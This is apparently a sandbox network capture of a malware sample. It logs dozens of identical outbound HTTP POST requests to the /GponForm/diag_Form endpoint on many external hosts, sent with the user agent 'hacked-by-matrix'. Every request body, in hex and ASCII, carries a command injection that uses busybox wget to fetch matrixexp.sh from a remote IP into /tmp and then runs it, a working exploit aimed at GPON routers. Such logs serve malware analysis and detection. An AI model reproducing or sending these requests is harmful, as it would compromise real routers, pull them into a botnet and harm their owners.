                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1540192.168.2.1342190212.54.209.255443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750902891 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1541192.168.2.13433185.61.108.162443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750916004 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1542192.168.2.133585642.201.251.69443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750921011 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1543192.168.2.1338372212.90.111.190443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750947952 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1544192.168.2.1351712212.226.73.156443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750955105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1545192.168.2.134771842.223.23.71443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750974894 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1546192.168.2.133821242.164.31.28443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750974894 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1547192.168.2.1335238212.194.39.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750979900 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1548192.168.2.1337974118.20.57.93443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750998020 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1549192.168.2.1355502109.169.170.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.750999928 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1550192.168.2.1338722118.106.197.32443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751012087 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1551192.168.2.134968642.187.193.206443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751028061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1552192.168.2.135533642.202.224.163443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751038074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1553192.168.2.13567645.254.85.36443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751056910 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1554192.168.2.1346094118.255.208.79443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751072884 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1555192.168.2.1338820212.9.179.120443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751091003 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1556192.168.2.134214842.220.113.249443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751108885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1557192.168.2.13390905.217.209.37443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751147985 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1558192.168.2.1341348212.89.107.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751163006 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1559192.168.2.1337248109.145.164.73443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751179934 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1560192.168.2.13564145.146.212.109443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751180887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1561192.168.2.1337742212.210.159.123443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751184940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1562192.168.2.1360982212.0.188.202443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.751184940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
